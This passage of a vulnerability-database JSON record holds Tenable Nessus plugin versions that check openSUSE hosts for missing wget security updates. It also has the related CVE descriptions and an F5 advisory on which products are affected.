"exploitdb"}, {"idList": ["SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"], "type": "suse"}, {"idList": ["CVE-2015-2059", "CVE-2016-4971"], "type": "cve"}, {"idList": ["6DF56C60-3738-11E6-A671-60A44CE6887B", "4CAF01E2-30E6-11E5-A4A5-002590263BF5"], "type": "freebsd"}, {"idList": ["OPENVAS:1361412562310871702", "OPENVAS:1361412562310869825", "OPENVAS:1361412562310703578", "OPENVAS:1361412562310869360", "OPENVAS:1361412562310120709", "OPENVAS:1361412562310869803", "OPENVAS:1361412562310808463", "OPENVAS:1361412562310130038", "OPENVAS:1361412562310808439", "OPENVAS:703578"], "type": "openvas"}, {"idList": ["USN-3068-1", "USN-3012-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-536-1:51225", "DEBIAN:DLA-476-1:61871", "DEBIAN:DSA-3578-1:1FEE8", "DEBIAN:DLA-291-1:F7790", "DEBIAN:DLA-277-1:149FA"], "type": "debian"}, {"idList": ["ASA-201606-19"], "type": "archlinux"}, {"idList": ["CESA-2016:2587"], "type": "centos"}, {"idList": ["RHSA-2016:2587"], "type": "redhat"}, {"idList": ["SSA-2016-165-01"], "type": "slackware"}, {"idList": ["PACKETSTORM:137795"], "type": "packetstorm"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "5991bd09dd3599911c086033fa9a23d1c1edadcf2baec55e97b5e88dbb73c2f6", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9a127128ec69ac667e86e5f3c35491b8", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "78380ff63862ab0298c0bd584719b6b6", "key": "references"}, {"hash": "62e698d10394c057d4c04be48ade1a82", "key": "sourceData"}, {"hash": "450c22ac790da2dd73385bc0def48eb3", "key": "title"}, {"hash": "bcd8abde7f060a8789d08ba0ba73d345", "key": "modified"}, {"hash": "6fd51175a5b1f1715711c3f644f87ce0", "key": "description"}, {"hash": "dda28ffbd67dd0668e5ed3862dff8dca", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "bf075a2e5050f9fb0e8c0726f9a6e082", "key": "pluginID"}, {"hash": "782af1722d6c251ca784cd8cb6206941", "key": "published"}, {"hash": "c17b1ab6089bc563ae8f428088d54fe7", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=93430", "id": "OPENSUSE-2016-1067.NASL", "lastseen": "2019-01-16T20:24:51", "modified": "2016-10-13T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "93430", "published": "2016-09-12T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=984060", "https://bugzilla.opensuse.org/show_bug.cgi?id=937096", "https://bugzilla.opensuse.org/show_bug.cgi?id=958342"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93430);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2016/10/13 14:27:27 $\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 6, "lastseen": "2019-01-16T20:24:51"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096, CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 1, "hash": "d753929cc9663400877ad9250ff2d65db98cd766558c48146ec97c000df6cbe5", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9a127128ec69ac667e86e5f3c35491b8", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "78380ff63862ab0298c0bd584719b6b6", "key": "references"}, {"hash": "450c22ac790da2dd73385bc0def48eb3", "key": "title"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "0bd231b3a7d4f59deef577bec41cfaee", "key": "sourceData"}, {"hash": "bf075a2e5050f9fb0e8c0726f9a6e082", "key": "pluginID"}, {"hash": "6bc146cd16afabe5f55b4706d32ba377", "key": "description"}, {"hash": "782af1722d6c251ca784cd8cb6206941", "key": "published"}, {"hash": "782af1722d6c251ca784cd8cb6206941", "key": "modified"}, {"hash": "c17b1ab6089bc563ae8f428088d54fe7", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=93430", "id": "OPENSUSE-2016-1067.NASL", "lastseen": "2016-09-26T17:23:48", "modified": "2016-09-12T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "93430", "published": "2016-09-12T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=984060", "https://bugzilla.opensuse.org/show_bug.cgi?id=937096", "https://bugzilla.opensuse.org/show_bug.cgi?id=958342"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93430);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2016/09/12 13:37:17 $\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:23:48"}], "edition": 11, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "dda28ffbd67dd0668e5ed3862dff8dca"}, {"key": "cvelist", "hash": "c17b1ab6089bc563ae8f428088d54fe7"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "6fd51175a5b1f1715711c3f644f87ce0"}, {"key": "href", "hash": "e80788aa1c1ddb449fbf74c19c5ad577"}, {"key": "modified", "hash": "2249940a684898a70237266de5d6dd6c"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "bf075a2e5050f9fb0e8c0726f9a6e082"}, {"key": "published", "hash": "782af1722d6c251ca784cd8cb6206941"}, {"key": "references", "hash": "78380ff63862ab0298c0bd584719b6b6"}, {"key": "reporter", "hash": "b7beaf9d124542f914ef08e608facdab"}, {"key": "sourceData", "hash": "85a1dbd2589f6cc3f4433a53e1ea788c"}, {"key": "title", "hash": "450c22ac790da2dd73385bc0def48eb3"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "70b9456094534977885e240322e04185d6afd1e3b04453454dbced9b0e8902ec", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2059", "CVE-2016-4971"]}, {"type": "f5", "idList": ["F5:K55181425", "SOL55181425"]}, {"type": "nessus", "idList": ["SUSE_SU-2016-2226-1.NASL", "GENTOO_GLSA-201610-11.NASL", "EULEROS_SA-2016-1064.NASL", "DEBIAN_DLA-536.NASL", "FEDORA_2016-2DB8CBC2FD.NASL", "FEDORA_2016-24135DFE43.NASL", "FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "ORACLELINUX_ELSA-2016-2587.NASL", "UBUNTU_USN-3012-1.NASL", "ALA_ALAS-2016-720.NASL"]}, {"type": "amazon", "idList": ["ALAS-2016-720"]}, {"type": "ubuntu", "idList": ["USN-3012-1", "USN-3068-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:40064"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106827", "OPENVAS:1361412562310130038", "OPENVAS:1361412562310808463", "OPENVAS:1361412562310120709", "OPENVAS:1361412562310808447", "OPENVAS:1361412562310808439", "OPENVAS:1361412562310871702", "OPENVAS:1361412562310842802", "OPENVAS:703578", "OPENVAS:1361412562310869803"]}, {"type": "freebsd", "idList": ["4CAF01E2-30E6-11E5-A4A5-002590263BF5", "6DF56C60-3738-11E6-A671-60A44CE6887B"]}, {"type": "zdt", "idList": ["1337DAY-ID-25433"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99", "CFOUNDRY:7564F58510B8A05C74D232728F162219"]}, {"type": "slackware", "idList": ["SSA-2016-165-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137795"]}, {"type": "centos", "idList": ["CESA-2016:2587"]}, {"type": "redhat", "idList": ["RHSA-2016:2587"]}, {"type": "debian", "idList": ["DEBIAN:DLA-536-1:51225", "DEBIAN:DLA-291-1:F7790", "DEBIAN:DLA-476-1:61871", "DEBIAN:DLA-277-1:149FA", "DEBIAN:DSA-3578-1:1FEE8"]}, {"type": "gentoo", "idList": ["GLSA-201610-11"]}, {"type": "archlinux", "idList": ["ASA-201606-19"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2587"]}, {"type": "suse", "idList": ["SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"]}], "modified": "2020-01-01T00:27:32"}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-01-01T00:27:32"}, "vulnersScore": 6.9}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93430);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2019/04/11 17:23:07\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "93430", "cpe": ["cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debugsource"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:14:40", "bulletinFamily": "NVD", "description": "The stringprep_utf8_to_ucs4 function in libin before 1.31, as used in jabberd2, allows context-dependent attackers to read system memory and possibly have other unspecified impact via invalid UTF-8 characters in a string, which triggers an out-of-bounds read.", "modified": "2018-10-30T16:27:00", "id": "CVE-2015-2059", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2059", "published": "2015-08-12T14:59:00", "title": "CVE-2015-2059", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-4971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4971", "published": "2016-06-30T17:59:00", "title": "CVE-2016-4971", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "f5": [{"lastseen": "2017-06-08T00:16:23", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 490963 (ARX) and INSTALLER-2560 (Traffix SDC) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| 6.2.0 - 6.4.0| None| Low| **Wget** utility \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0| None| Low| **Wget** utility\n\nIf you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Versions known to be not vulnerable column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. \n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)[\u200b](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2016-07-13T21:28:00", "published": "2016-07-13T21:28:00", "id": "F5:K55181425", "href": "https://support.f5.com/csp/article/K55181425", "title": "Wget vulnerability CVE-2016-4971", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-03T05:27:47", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Versions known to be not vulnerable column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users.\u00c2 \n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\u00e2\u0080\u008b\n", "modified": "2016-07-13T00:00:00", "published": "2016-07-13T00:00:00", "id": "SOL55181425", "href": "http://support.f5.com/kb/en-us/solutions/public/k/55/sol55181425.html", "type": "f5", "title": "SOL55181425 - Wget vulnerability CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2020-01-01T01:46:25", "bulletinFamily": "scanner", "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing 